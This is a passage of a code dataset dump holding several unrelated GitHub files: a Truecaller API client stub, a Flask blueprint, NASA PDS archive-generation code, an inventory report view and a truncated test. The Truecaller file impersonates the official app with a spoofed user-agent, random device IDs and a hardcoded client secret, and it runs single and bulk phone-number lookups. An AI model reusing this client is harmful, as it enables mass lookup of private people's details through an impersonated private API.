parse_phone_number(phone_number, None)\n device = get_random_device()\n\n if not pn or not pn.country_code or not pn.national_number:\n raise ValueError(\"Invalid phone number.\")\n\n post_url = \"https://account-asia-south1.truecaller.com/v2/sendOnboardingOtp\"\n\n data = {\n \"countryCode\": str(region_code_for_country_code(pn.country_code)),\n \"dialingCode\": pn.country_code,\n \"installationDetails\": {\n \"app\": {\n \"buildVersion\": 5,\n \"majorVersion\": 11,\n \"minorVersion\": 7,\n \"store\": \"GOOGLE_PLAY\",\n },\n \"device\": {\n \"deviceId\": generate_random_string(16),\n \"language\": \"en\",\n \"manufacturer\": device[\"manufacturer\"],\n \"model\": device[\"model\"],\n \"osName\": \"Android\",\n \"osVersion\": \"10\",\n \"mobileServices\": [\"GMS\"],\n },\n \"language\": \"en\",\n },\n \"phoneNumber\": str(pn.national_number),\n \"region\": \"region-2\",\n \"sequenceNo\": 2,\n }\n\n headers = {\n \"content-type\": \"application/json; charset=UTF-8\",\n \"accept-encoding\": \"gzip\",\n \"user-agent\": \"Truecaller/11.75.5 (Android;10)\",\n \"clientsecret\": \"lvc22mp3l1sfv6ujg83rd17btt\",\n }\n\n response = requests.post(post_url, json=data, headers=headers)\n return response.json()\n\n\ndef verify_otp(phone_number: str, json_data: Dict[str, str], otp: str) -> Dict[str, Union[str, int]]:\n \"\"\"\n Verify the OTP (One-Time Password) for phone number verification.\n\n Args:\n phone_number (str): The phone number in international format.\n json_data (dict): The JSON response data from the login request containing the requestId.\n otp (str): The OTP to verify.\n\n Returns:\n dict: The verification response containing the result of the OTP verification.\n\n Raises:\n ValueError: If the phone number is invalid.\n requests.exceptions.RequestException: If an error occurs during the API request.\n \"\"\"\n try:\n parsed_number = parse_phone_number(phone_number)\n if not phonenumbers.is_valid_number(parsed_number):\n raise ValueError(\"Phone number should be in international format.\")\n\n country_code = str(region_code_for_country_code(\n parsed_number.country_code))\n dialing_code = parsed_number.country_code\n phone_number = str(parsed_number.national_number)\n\n post_data = {\n \"countryCode\": country_code,\n \"dialingCode\": dialing_code,\n \"phoneNumber\": phone_number,\n \"requestId\": json_data[\"requestId\"],\n \"token\": otp,\n }\n\n headers = {\n \"content-type\": \"application/json; charset=UTF-8\",\n \"accept-encoding\": \"gzip\",\n \"user-agent\": \"Truecaller/11.75.5 (Android;10)\",\n \"clientsecret\": \"lvc22mp3l1sfv6ujg83rd17btt\",\n }\n\n url = \"https://account-asia-south1.truecaller.com/v1/verifyOnboardingOtp\"\n\n response = requests.post(url, json=post_data, headers=headers)\n return response.json()\n\n except phonenumbers.phonenumberutil.NumberParseException:\n raise ValueError(\"Invalid phone number.\")\n\n\ndef search(phone_number: str, country_code: str, installation_id: str) -> Dict[str, any]:\n \"\"\"\n Search for a phone number using Truecaller API.\n\n Args:\n phone_number (str): The phone number to search.\n country_code (str): The country code of the phone number.\n installation_id (str): The installation ID for authorization.\n\n Returns:\n dict: The search result containing information about the phone number.\n\n Raises:\n requests.exceptions.RequestException: If an error occurs during the API request.\n \"\"\"\n phone_number = parse_phone_number(phone_number, country_code)\n significant_number = phone_number.national_number\n\n headers = {\n \"content-type\": \"application/json; charset=UTF-8\",\n \"accept-encoding\": \"gzip\",\n \"user-agent\": \"Truecaller/11.75.5 (Android;10)\",\n \"Authorization\": f\"Bearer {installation_id}\"\n }\n params = {\n \"q\": str(significant_number),\n \"countryCode\": phone_number.country_code,\n \"type\": 4,\n \"locAddr\": \"\",\n \"placement\": \"SEARCHRESULTS,HISTORY,DETAILS\",\n \"encoding\": \"json\"\n }\n response = requests.get(\n \"https://search5-noneu.truecaller.com/v2/search\", params=params, headers=headers)\n\n response_data = response.json()\n return response_data\n\n\ndef bulk_search(phone_numbers: List[str], country_code: str, installation_id: str) -> Dict[str, any]:\n \"\"\"\n Perform bulk search for a list of phone numbers using Truecaller API.\n\n Args:\n phone_numbers (List[str]): The list of phone numbers to search.\n country_code (str): The country code of the phone numbers.\n installation_id (str): The installation ID for authorization.\n\n Returns:\n dict: The bulk search result containing information about the phone numbers.\n\n Raises:\n requests.exceptions.RequestException: If an error occurs during the API request.\n \"\"\"\n headers = {\n \"content-type\": \"application/json; charset=UTF-8\",\n \"accept-encoding\": \"gzip\",\n \"user-agent\": \"Truecaller/11.75.5 (Android;10)\",\n \"Authorization\": f\"Bearer {installation_id}\"\n }\n params = {\n \"q\": phone_numbers,\n \"countryCode\": country_code,\n \"type\": 14,\n \"placement\": \"SEARCHRESULTS,HISTORY,DETAILS\",\n \"encoding\": \"json\"\n }\n response = requests.get(\n \"https://search5-noneu.truecaller.com/v2/bulk\", params=params, headers=headers)\n\n response_data = response.json()\n return response_data\n","repo_name":"sumithemmadi/truecallerpy","sub_path":"src/truecallerpy/typings/truecallerpy.pyi","file_name":"truecallerpy.pyi","file_ext":"pyi","file_size_in_byte":6873,"program_lang":"python","lang":"en","doc_type":"code","stars":76,"dataset":"github-code","pt":"21"} +{"seq_id":"24227754395","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Mar 20 00:11:41 2021\n\n@author: loic\n\"\"\"\n\nfrom flask import Blueprint, Flask, redirect , url_for , render_template, request, session, flash, jsonify\nfrom flask_login import login_required, current_user\nfrom .models import Candidat,User\nfrom . import db\nimport json\n\ncandidats = Blueprint('candidats',__name__)\n\n@candidats.route(\"/personnelle\")\n@login_required\ndef personnelle():\n if current_user.compte not in [\"candidat\",\"admin\"]:\n flash(\"vous n'êtes pas un candidat !\",'fail')\n return redirect(url_for(\"views.matching\"))\n else:\n profil_image = url_for(\"static\",filename=f\"images/{current_user.profil_image}\")\n return render_template(\"/candidat/personelle.html\",profil_image = profil_image)\n\n\n@candidats.route(\"/profil\")\n@login_required\ndef profil():\n if current_user.compte not in [\"candidat\",\"admin\"]:\n flash(\"vous n'êtes pas un candidat !\",'fail')\n return redirect(url_for(\"views.matching\"))\n else:\n return render_template(\"/candidat/profil.html\")\n\n\n@candidats.route(\"/approfondir\")\n@login_required\ndef approfondir():\n if current_user.compte not in [\"candidat\",\"admin\"]:\n flash(\"vous n'êtes pas un candidat !\",'fail')\n return redirect(url_for(\"views.matching\"))\n else:\n return render_template(\"/candidat/approfondir.html\")\n","repo_name":"fiastros/finder","sub_path":"app/website/candidats.py","file_name":"candidats.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43168614767","text":"import argparse\nimport dataclasses\nimport hashlib\nimport http.client\nimport logging\nimport sys\nfrom datetime import datetime\n\nimport pds.api_client # type: ignore\nfrom pds.api_client.exceptions import ApiAttributeError # type: ignore\nfrom pds.api_client.exceptions import NotFoundException # type: ignore\nfrom pds.api_client.model.pds_product import PdsProduct # type: ignore\n\nfrom . import VERSION\nfrom .aip import writelabel as writeaiplabel\nfrom .constants import AIP_SIP_DEFAULT_VERSION\nfrom .constants import PDS_LABEL_FILENAME_EXTENSION\nfrom .constants import PDS_TABLE_FILENAME_EXTENSION\nfrom .constants import PROVIDER_SITE_IDS\nfrom .sip import writelabel as writesiplabel\nfrom .utils import addbundlearguments\nfrom .utils import addloggingarguments\n# Import entity classes: in this case we just need class ``Product``.\n#\n# 😛 Apparently this API changes with the phase of the moon. See, in some versions of pds.api-client,\n# the name of the ``model`` package is ``model``, singular. But then seemingly at random, it becomes\n# ``models`` plural. And even some releases support *both*. So here we try to accomodate whatever the\n# flavor du jour is.\n# If this fails to import, then we're using a pds.api-client ≤ 0.5.0, which I'm arbitrarily declaring \"too old\":\n\n# Import functional endpoints.\n#\n# 😛 Apparently this API changes more more frequently than a fringe politician's platform. See, in\n# some versions of pds.api-client, the endpoint classes are importable directly from ``pds.api_client``.\n# And in other releases, they're not. And it seems to swap randomly. So here we try to be resilient\n# to whatever the pds.api-client we get stuck with.\ntry:\n from pds.api_client import CollectionsProductsApi, BundlesCollectionsApi, BundlesApi # type: ignore\nexcept ImportError:\n from pds.api_client.api.bundles_api import BundlesApi # type: ignore\n from pds.api_client.api.bundles_collections_api import BundlesCollectionsApi # type: ignore\n from pds.api_client.api.collections_products_api import CollectionsProductsApi # type: ignore\n\n\n# Constants\n# =========\n#\n# Logging\n# -------\n\n_logger = logging.getLogger(__name__) # The one true logger for PDS\n_progresslogging = 100 # How frequently to report PDS progress; every N items\n\n\n# PDS API Access\n# --------------\n\n_apiquerylimit = 50 # Pagination in the PDS API\n_defaultserver = \"https://pds.nasa.gov/api/search/1.0/\"\n\n\n# PDS API property keys we're interested in\n# -----------------------------------------\n\n_propdataurl = \"ops:Data_File_Info.ops:file_ref\"\n_propdatamd5 = \"ops:Data_File_Info.ops:md5_checksum\"\n_proplabelurl = \"ops:Label_File_Info.ops:file_ref\"\n_proplabelmd5 = \"ops:Label_File_Info.ops:md5_checksum\"\n_fields = [_propdataurl, _propdatamd5, _proplabelurl, _proplabelmd5]\n\n\n# Program/Module Metadata\n# -----------------------\n\n_description = \"\"\"Generate \"PDS deep archives\" of PDS data bundles from the PDS Registry Service, which\nincludes PDS Archive Information Packages (AIPs) and PDS Submission Information Packages (SIPs). If you\nhave a PDS bundle locally in your filesystem, use ``pds-deep-archive`` instead. This program is intended\nfor when the PDS bundle is remotely available via the HTTP PDS application programmer interface (API).\"\"\"\n__version__ = VERSION\n\n\n# Classes\n# =======\n\n\n@dataclasses.dataclass(order=True, frozen=True)\nclass _File:\n \"\"\"A \"PDS file\" of some kind in the PDS Registry Service whose details we get via the PDS API.\"\"\"\n\n url: str\n md5: str\n\n\ndef _deurnlidvid(lidvid: str) -> tuple[str, str]:\n \"\"\"De-URN a LID VID.\n\n Given a PDS ``lidvid`` as a Uniform Resource Name such as ``urn:nasa:pds:whatever::1.0``,\n transform it to a double of ``whatever`` and ``1.0``.\n \"\"\"\n lid, vid = lidvid.split(\"::\")\n return lid.split(\":\")[-1], vid\n\n\ndef _makefilename(lidvid: str, ts: datetime, kind: str, ext: str) -> str:\n \"\"\"Make a filename.\n\n Make a PDS filename for the given ``lidvid`` by dropping its URN prefix, splitting it into\n LID and VID, adding the date part of the ``ts`` timestamp, slapping on the ``kind`` of file it\n is, and the given ``ext``ension, which should already include the ``.``.\n \"\"\"\n lid, vid = _deurnlidvid(lidvid)\n slate = ts.date().strftime(\"%Y%m%d\")\n return f\"{lid}_v{vid}_{slate}_{kind}_v{AIP_SIP_DEFAULT_VERSION}{ext}\"\n\n\ndef _getbundle(apiclient: pds.api_client.ApiClient, lidvid: str) -> PdsProduct:\n \"\"\"Get a bundle.\n\n Using the PDS ``apiclient`` find the PDS bundle with the named ``lidvid``\n and return as a ``pds.api_client.models.pds_product.PdsProduct``. If it\n can't be found, return ``None``.\n \"\"\"\n try:\n _logger.debug(\"⚙️ Asking ``bundle_by_lidvid`` for %s\", lidvid)\n bundles = BundlesApi(apiclient)\n return bundles.bundle_by_lidvid(lidvid) # type = ``Product_Bundle``\n except pds.api_client.exceptions.ApiException as ex:\n if ex.status == http.client.NOT_FOUND:\n return None\n else:\n raise\n\n\ndef _getcollections(apiclient: pds.api_client.ApiClient, lidvid: str, allcollections=True):\n \"\"\"Get the collections.\n\n Using the PDS ``apiclient`` generate collections that belong to the PDS bundle ``lidvid``.\n\n If ``allcollections`` is True, then return all collections for LID-only references; otherwise\n return just the latest collection for LID-only references (has no effect on full LIDVID-references.\n \"\"\"\n bcapi, start = BundlesCollectionsApi(apiclient), 0\n while True:\n _logger.debug('⚙️ Asking ``collections_of_a_bundle`` for %s at %d limit %d', lidvid, start, _apiquerylimit)\n\n try:\n if allcollections:\n results = bcapi.collections_of_a_bundle_all(lidvid, start=start, limit=_apiquerylimit, fields=_fields)\n else:\n results = bcapi.collections_of_a_bundle_latest(\n lidvid, start=start, limit=_apiquerylimit, fields=_fields\n )\n if len(results.data) == 0: return\n start += len(results.data)\n for i in results.data:\n yield i\n\n except NotFoundException: # end of the pages\n return\n\n\ndef _getproducts(apiclient: pds.api_client.ApiClient, lidvid: str):\n \"\"\"Using the PDS ``apiclient`` generate PDS products that belong to the collection ``lidvid``.\"\"\"\n cpapi, start = CollectionsProductsApi(apiclient), 0\n while True:\n try:\n _logger.debug(\"⚙️ Asking ``products_of_a_collection`` for %s at %d limit %d\", lidvid, start, _apiquerylimit)\n results = cpapi.products_of_a_collection(lidvid, start=start, limit=_apiquerylimit, fields=_fields)\n if len(results.data) == 0: return\n start += len(results.data)\n for i in results.data:\n yield i\n\n except pds.api_client.exceptions.ApiException as ex:\n if ex.status == http.client.NOT_FOUND:\n return\n else:\n raise\n\n\ndef _addfiles(product: PdsProduct, bac: dict):\n \"\"\"Add the PDS files described in the PDS ``product`` to the ``bac``.\"\"\"\n # 😛 Apparently this API changes as frequently as my knickers. See, in some releases of pds.api-client,\n # ``Product`` entity objects have two named attributes, ``id`` and ``properties``. But then sometimes,\n # and for apparently random reasons, ``id`` and ``properties`` become indexed elements of a ``Product``.\n # So, we try to accommodate whatever the flavor du jour is.\n try:\n lidvid, props = product['id'], product['properties']\n except TypeError:\n lidvid, props = product.id, product.properties\n\n files = bac.get(lidvid, set()) # Get the current set (or a new empty set)\n\n if _propdataurl in props: # Are there data files in the product?\n # 😛 Apparently this API changes depending on the day of the week. See, in some releases of\n # pds.api-client, the URLs and MD5s are directly two sequences of the properties. And in other\n # releases, they're sequences of the ``value`` element of the properties. Why? Who knows! We\n # jump through this extra try…except block here so we can work with whatever the pds.api-client\n # decides to be that day.\n try:\n urls, md5s = props[_propdataurl], props[_propdatamd5] # Get the URLs and MD5s of them\n for url, md5 in zip(urls, md5s): # For each URL and matching MD5\n files.add(_File(url, md5)) # Add it to the set\n except ApiAttributeError:\n urls, md5s = props[_propdataurl]['value'], props[_propdatamd5]['value'] # Get the URLs and MD5s of them\n for url, md5 in zip(urls, md5s):\n files.add(_File(url, md5))\n\n # 😛 Apparently this API changes faster than Coinstar™. For the same reason above, sometimes the\n # URL and MD5 sequences are directly accessible from the properties, and sometimes they're in a\n # ``value`` element of properties. Whew!\n try:\n if _proplabelurl in props: # How about the label itself?\n files.add(_File(props[_proplabelurl][0], props[_proplabelmd5][0])) # Add it too\n except ApiAttributeError:\n if _proplabelurl in props: # How about the label itself?\n files.add(_File(props[_proplabelurl]['value'][0], props[_proplabelmd5]['value'][0])) # Add it too\n\n bac[lidvid] = files # Stash for future use\n\n\ndef _comprehendregistry(url: str, bundlelidvid: str, allcollections=True) -> tuple[int, dict, str]:\n \"\"\"Fathom the registry.\n\n Query the PDS API at ``url`` for all information about the PDS ``bundlelidvid`` and return a\n comprehension of it. If ``allcollections`` is True, we include every reference from a collection\n that's LID-only; if it's False, then we only include the latest reference form a LID-only reference.\n A \"comprehension of it\" means a triple of the common prefix length of all PDS paths referenced\n within it, the \"B.A.C.\" (a dict mapping PDS lidvids to sets of ``_File``s), and the title of\n the PDS bundle.\n\n If ``allcollections`` is True, we include all collections, meaning that if a bundle references\n a collection with LID only (no VID), we include all version IDs of that collection. When this\n flag ``allcollections`` is False, then we include only the *latest* collection for a LID-only\n reference.\n \"\"\"\n _logger.debug(\"🤔 Comprehending the registry at %s for %s\", url, bundlelidvid)\n\n # Set up our client connection\n config = pds.api_client.Configuration()\n config.host = url\n apiclient = pds.api_client.ApiClient(config)\n\n # This is the \"B.A.C.\" 😏\n bac: dict[str, set[_File]]\n bac = {}\n\n bundle = _getbundle(apiclient, bundlelidvid) # There's no class \"Bundle\" but class Product 🤷‍♀️\n if bundle is None:\n raise ValueError(f\"🤷‍♀️ The bundle {bundlelidvid} cannot be found in the registry at {url}\")\n\n # 😛 Did I mention this API changes **a lot?**\n #\n # The pds-api.client is pretty fickle between each release: sometimes ``title`` is an indexed value\n # of the ``bundle``, and sometimes it's a named attribute of the bundle. The try…except block here\n # handles both cases.\n try:\n title = bundle.get('title', '«unknown»')\n except AttributeError:\n title = bundle.title if bundle.title else '«unknown»'\n\n _addfiles(bundle, bac)\n\n # 😛 I'm sure I mentioned it by now!\n #\n # Ditto the above comment, but for ``metadata``'s ``label_url'.\n try:\n bundleurl = bundle['metadata']['label_url']\n except TypeError:\n bundleurl = bundle.metadata.label_url\n\n prefixlen = bundleurl.rfind(\"/\") + 1\n\n # It turns out the PDS registry makes this *trivial* compared to the PDS filesystem version;\n # Just understanding it all was there was the hard part! 😊 THANK YOU! 🙏\n for collection in _getcollections(apiclient, bundlelidvid, allcollections):\n _addfiles(collection, bac)\n for product in _getproducts(apiclient, collection.id):\n _addfiles(product, bac)\n\n # C'est tout 🌊\n return prefixlen, bac, title\n\n\ndef _writechecksummanifest(fn: str, prefixlen: int, bac: dict) -> tuple[str, int, int]:\n \"\"\"Write an AIP \"checksum manifest\".\n\n This writes an AIP \"checksum manifest\" to the given ``fn`` PDS filename, stripping ``prefixlen``\n characters off paths, and using information from the ``bac``. Return a triple of the MD5\n of the manifest, its size in bytes, and a count of the number of entries in it.\n \"\"\"\n hashish, size, count = hashlib.new(\"md5\"), 0, 0\n with open(fn, \"wb\") as o:\n for files in bac.values():\n for f in files:\n entry = f\"{f.md5}\\t{f.url[prefixlen:]}\\r\\n\".encode(\"utf-8\")\n o.write(entry)\n hashish.update(entry)\n size += len(entry)\n count += 1\n if count % _progresslogging == 0:\n _logger.debug(\"⏲ Wrote %d entries into the checksum manifest %s\", count, fn)\n _logger.info(\"📄 Wrote AIP checksum manifest %s with %d entries\", fn, count)\n return hashish.hexdigest(), size, count\n\n\ndef _writetransfermanifest(fn: str, prefixlen: int, bac: dict) -> tuple[str, int, int]:\n \"\"\"Write an AIP \"transfer manifest\".\n\n This writes an AIP \"transfer manifest\" to the named ``fn`` PDS file, stripping ``prefixlen``\n characters off the beginnings of PDS paths, and using info in the ``bac``. Return a triple of\n the MD5 of the created manifest, its size in bytes, and a count of its entries.\n \"\"\"\n _logger.debug(\"⚙️ Writing AIP transfer manifest to %s\", fn)\n hashish, size, count = hashlib.new(\"md5\"), 0, 0\n with open(fn, \"wb\") as o:\n for lidvid, files in bac.items():\n for f in files:\n entry = f\"{lidvid:255}/{f.url[prefixlen:]:255}\\r\\n\".encode(\"utf-8\")\n o.write(entry)\n hashish.update(entry)\n size += len(entry)\n count += 1\n if count % _progresslogging == 0:\n _logger.debug(\"⏲ Wrote %d entries into the transfer manifest %s\", count, fn)\n _logger.info(\"📄 Wrote AIP transfer manifest %s with %d entries\", fn, count)\n return hashish.hexdigest(), size, count\n\n\ndef _writeaip(bundlelidvid: str, prefixlen: int, bac: dict, ts: datetime) -> str:\n \"\"\"Create the PDS Archive Information Package.\n\n This creates the PDS Archive Information Package for the given ``bundlelidvid``, stripping\n ``prefixlen`` characters off file paths and using information in the ``bac``. The ``ts``\n timestamp tells what metadata to put in the PDS label and the date for generated PDS\n filenames. Return a stringified version of the MD5 hash of the *checksum manifest* of the AIP.\n \"\"\"\n _logger.debug(\"⚙️ Creating AIP for %s\", bundlelidvid)\n cmfn = _makefilename(bundlelidvid, ts, \"checksum_manifest\", PDS_TABLE_FILENAME_EXTENSION)\n tmfn = _makefilename(bundlelidvid, ts, \"transfer_manifest\", PDS_TABLE_FILENAME_EXTENSION)\n cmmd5, cmsize, cmnum = _writechecksummanifest(cmfn, prefixlen, bac)\n tmmd5, tmsize, tmnum = _writetransfermanifest(tmfn, prefixlen, bac)\n lid, vid = _deurnlidvid(bundlelidvid)\n labelfn = _makefilename(bundlelidvid, ts, \"aip\", PDS_LABEL_FILENAME_EXTENSION)\n writeaiplabel(labelfn, f\"{lid}_v{vid}\", lid, vid, cmfn, cmmd5, cmsize, cmnum, tmfn, tmmd5, tmsize, tmnum, ts)\n _logger.info(\"📄 Wrote label for them both: %s\", labelfn)\n return cmmd5\n\n\ndef _writesip(bundlelidvid: str, bac: dict, title: str, site: str, ts: datetime, cmmd5: str):\n \"\"\"Write a Submission Information Package.\n\n This writes a Submission Information Package based on the ``bac`` to the current directory\n generating PDS filenames and other label metadata from the timestamp ``ts`` and ``bundlelidvid``.\n The ``cmmd5`` is the MD5 digest of the PDS Archive Information Package's transfer manifest and\n also goes into the PDS label. The PDS ``site`` is a string like ``PDS_ATM`` indicating the\n PDS site. You'd think we could get that from the PDS API but 🤷‍♀️.\n \"\"\"\n _logger.debug(\"⚙️ Creating SIP for %s (title %s) for site %s\", bundlelidvid, title, site)\n sipfn = _makefilename(bundlelidvid, ts, \"sip\", PDS_TABLE_FILENAME_EXTENSION)\n hashish, size, count = hashlib.new(\"md5\"), 0, 0\n with open(sipfn, \"wb\") as o:\n for lidvid, files in bac.items():\n for f in files:\n entry = f\"{f.md5}\\tMD5\\t{f.url}\\t{lidvid}\\r\\n\".encode(\"utf-8\")\n o.write(entry)\n hashish.update(entry)\n size += len(entry)\n count += 1\n if count % _progresslogging == 0:\n _logger.debug(\"⏲ Wrote %d entries into the submission info file %s\", count, sipfn)\n _logger.info(\"📄 Wrote SIP %s with %d entries\", sipfn, count)\n labelfn = _makefilename(bundlelidvid, ts, \"sip\", PDS_LABEL_FILENAME_EXTENSION)\n _logger.info(\"📄 Wrote label for SIP: %s\", labelfn)\n with open(labelfn, \"wb\") as o:\n lid, vid = _deurnlidvid(bundlelidvid)\n writesiplabel(lid, vid, title, hashish.hexdigest(), size, count, \"MD5\", sipfn, site, o, cmmd5, ts)\n\n\ndef generatedeeparchive(url: str, bundlelidvid: str, site: str, allcollections=True):\n \"\"\"Make a PDS \"deep archive\" 🧘 in the current directory.\n\n A PDS \"deep archive\" 🧘‍♀️ (consisting of the Archive Information Package's transfer manifest and\n checksum manifest, and the Submission Information Package's table file—plus their corresponding\n labels) for the named PDS bundle identified by ``bundlelidvid``, for the PDS ``site``, using knowledge\n in the PDS Registry at ``url``, including ``allcollections`` if True else just the latest collection\n for PDS bundles that reference collections by logical identifier only.\n \"\"\"\n # When is happening? Make a timestamp and remove the timezone info\n ts = datetime.utcnow()\n ts = datetime(ts.year, ts.month, ts.day, ts.hour, ts.minute, ts.second, microsecond=0, tzinfo=None)\n\n # Figure out what we're dealing with\n prefixlen, bac, title = _comprehendregistry(url, bundlelidvid, allcollections)\n\n # Make it rain ☔️\n cmmd5 = _writeaip(bundlelidvid, prefixlen, bac, ts)\n _writesip(bundlelidvid, bac, title, site, ts, cmmd5)\n\n\ndef main():\n \"\"\"Check the command line and make a PDS Deep Archive for the named PDS bundle LIDVID.\"\"\"\n parser = argparse.ArgumentParser(description=_description)\n parser.add_argument(\"--version\", action=\"version\", version=f\"%(prog)s {__version__}\")\n addloggingarguments(parser)\n addbundlearguments(parser)\n parser.add_argument(\n \"-u\", \"--url\", default=_defaultserver, help=\"URL to the PDS API of the PDS Registry to use [%(default)s]\"\n )\n parser.add_argument(\n \"-s\", \"--site\", required=True, choices=PROVIDER_SITE_IDS, help=\"Provider site ID for the manifest's label\"\n )\n parser.add_argument(\"bundle\", help=\"LIDVID of the PDS bundle for which to create a PDS Deep Archive\")\n args = parser.parse_args()\n logging.basicConfig(level=args.loglevel, format=\"%(levelname)s %(message)s\")\n _logger.info(\"👟 PDS Deep Registry-based Archive, version %s\", __version__)\n _logger.debug(\"💢 command line args = %r\", args)\n try:\n generatedeeparchive(args.url, args.bundle, args.site, not args.include_latest_collection_only)\n except pds.api_client.exceptions.ApiException as ex:\n if ex.status == http.client.INTERNAL_SERVER_ERROR:\n _logger.critical(\n \"🚨 The server at %s gave an INTERNAL SERVER ERROR; you should contact its administrator if you \"\n \"can figure out who that is. The following information may be helpful to them in figuring out \"\n \"the issue: «%r»\",\n args.url.rstrip('/'),\n ex.body,\n )\n sys.exit(-2)\n _logger.exception(\"💥 We got an unexpected error; sorry it didn't work out\")\n sys.exit(-3)\n finally:\n _logger.info(\"👋 Thanks for using this program! Bye!\")\n sys.exit(0)\n\n\nif __name__ == \"__main__\":\n main()\n\n\n# Notes\n# =====\n#\n# The following are stream-of-consciousness notes I made while developing this and may be ignored:\n#\n# matches = bundles.get_bundles(q='livi eq urn:nasa:pds:insight_documents:document_hp3rad::5.0')\n# matches = collections.get_collection(q='lidvid eq urn:nasa:pds:insight_documents:document_hp3rad::5.0')\n# matches = products.products(q='lidvid eq urn:nasa:pds:insight_documents:document_hp3rad::5.0', start=0, limit=9999)\n# matches = otherAPI.products_of_a_collection('urn:nasa:pds:insight_documents:document_hp3rad::8.0', start=0, limit=999)\n# print(matches)\n\n# We can do this way:\n# matches = bundles.get_bundles(q='lidvid eq {lidvid}\"')\n\n# Or we can do it this way:\n# bundle = bundles.bundle_by_lidvid('urn:nasa:pds:insight_documents::2.0')\n# At this point we have:\n# - bundle.id - the lidvid\n# - Possible filepath entry:\n# - bundle.metadata.label_url ???\n# - ops:Label_File_Info.ops:file_ref ???\n# - ops:Label_File_Info.ops:md5_checksum\n# - bundle.type - if this is \"Product_Collection\" then we can say \"isProductCollection\" is True\n# - May not have to worry about this? API might actually collate this for us\n# - bundle.properties\n# - pds:Bundle_Member_Entry.pds:lid_reference (perhaps there is pds:Bundle_Member_Entry.pds:lidvd_reference)?\n# - pds:Bundle_Member_Entry.pds:member_status (Primary or Secondary)\n#\n# - ops:Data_File_Info.ops:md5_checksum\n# - ops:Data_File_Info.ops:file_ref - maybe we can make the filepath out of this?\n# pprint(bundle)\n#\n# if aip: _writeaip(bundlelidvid, prefixlen, bac, ts)\n# if sip: _writesip(bundlelidvid, bac, ts)\n#\n# # xxx = bcapi.collections_of_a_bundle(bundlelidvid) # type of each = ``Product_Collection``\n# # xxx = bcapi.collections_of_a_bundle(bundlelidvid,\n# fields=['ops:Label_File_Info.ops:md5_checksum']) # type of each = ``Product_Collection``\n#\n# # The lidvid below comes from one of the responses iterating over xxx.data:\n# print('before')\n# for product in cpapi.products_of_a_collection('urn:nasa:pds:insight_documents:document_hp3rad::8.0').data:\n# print(product.id)\n# print('after')\n# for product in _getproducts(apiclient, 'urn:nasa:pds:insight_documents:document_hp3rad::8.0'):\n# print(product.id)\n# return\n\n# Approach then:\n# Get the bundle (to see if it's valid mostly but also get its fileref + md5)\n# Add the bundle + md5 to the b-a-collection\n# For each collection of the bundle:\n# add the collection + md5 to the b-a-collection\n# add any ops:Data_File_Info.ops:file_ref + md5 to the b-a-collection\n# for each product of a collection:\n# add the product + md5 to the b-a-collection\n# add the file_ref + md5 to the b-a-collection\n# Then write out the sip and aip of the b-a-collection\n#\n# Tables\n# - labels (lid, vid)\n# - inter_table_references (lid, vid, to_lid, to_vid (may be null))\n# - label_file_references (lid, vid, filepath)\n#\n# We may have to dump all that because the registry API seems to give a lot of data immediately\n# blobs? blobs???\n#\n# Using the https://pds.nasa.gov/api/search/1.0/ directly (without the Python pds.api_client):\n#\n# We are normally passed a bundle.xml file; we can get its info directly with:\n#\n# curl -X GET --header 'Accept: application/vnd.nasa.pds.pds4+xml' \\\n# 'https://pds.nasa.gov/api/search/1.0/bundles/urn%3Anasa%3Apds%3Ainsight_documents%3A%3A2.0'\n#\n# This gives:\n#\n# \n# \n# \n# …\n# …\n# \n# \n# readme.txt\n# Introduction to the bundle\n# \n#\n# …\n# \n# urn:nasa:pds:insight_documents:document_mission\n# Primary\n# bundle_has_document_collection\n# \n# …\n# \n# urn:nasa:pds:insight_documents:document_hp3rad\n# Primary\n# bundle_has_document_collection\n# \n# …\n","repo_name":"NASA-PDS/deep-archive","sub_path":"src/pds2/aipgen/registry.py","file_name":"registry.py","file_ext":"py","file_size_in_byte":24918,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"} +{"seq_id":"23639443413","text":"from gkcore import enumdict\nfrom gkcore.utils import authCheck\nfrom pyramid.view import view_defaults, view_config\nfrom pyramid.request import Request\nfrom gkcore import eng, enumdict\nfrom gkcore.models.gkdb import goprod, product\nfrom sqlalchemy.sql import select, and_\n\n\n@view_defaults(route_name=\"godown-register\")\nclass api_godownregister(object):\n def __init__(self, request):\n self.request = Request\n self.request = request\n\n @view_config(request_method=\"GET\", renderer=\"json\")\n def godown_register(self):\n # Check whether the user is registered & valid\n try:\n token = self.request.headers[\"gktoken\"]\n except:\n return {\"gkstatus\": enumdict[\"UnauthorisedAccess\"]}\n\n auth_details = authCheck(token)\n\n if auth_details[\"auth\"] == False:\n return {\"gkstatus\": enumdict[\"UnauthorisedAccess\"]}\n\n goproddetails = None\n godownstock = []\n godown_items = []\n goid = self.request.matchdict[\"goid\"]\n\n # Connecting to the DB table goprod & filtering the data for required org & godown\n\n try:\n result = eng.connect().execute(\n select([goprod]).where(\n and_(\n goprod.c.orgcode == auth_details[\"orgcode\"],\n goprod.c.goid == goid,\n )\n )\n )\n goproddetails = result.fetchall()\n\n except:\n return {\"gkstatus\": enumdict[\"ConnectionFailed\"]}\n\n # Connecting to the DB table product & filtering the data for the required productcode\n\n for productid in goproddetails:\n try:\n result = eng.connect().execute(\n select([product]).where(\n product.c.productcode == productid[\"productcode\"]\n )\n )\n godownstock.append(result.fetchone())\n except Exception as e:\n print(e)\n return {\"gkstatus\": enumdict[\"ConnectionFailed\"]}\n\n # Formatting the fetched data\n\n for p in godownstock:\n temp_dict = dict()\n for name, val in p.items():\n value_type = str(type(val))\n if value_type == \"\":\n temp_dict[name] = str(val)\n else:\n temp_dict[name] = val\n godown_items.append(temp_dict)\n\n return {\"gkstatus\": enumdict[\"Success\"], \"gkresult\": godown_items}\n","repo_name":"gnukhata/gkcore","sub_path":"gkcore/views/reports/api_godownregister.py","file_name":"api_godownregister.py","file_ext":"py","file_size_in_byte":2539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29316572655","text":"import pytest\n\nfrom src.problems.longest_substr_with_two_dist_chars import Solution\n\n\n@pytest.mark.parametrize(\n \"s,expected\",\n [\n (\"eceba\", 3),\n (\"ccaabbb\", 5),\n (\"ababcbcbaaabbdef\", 6),\n 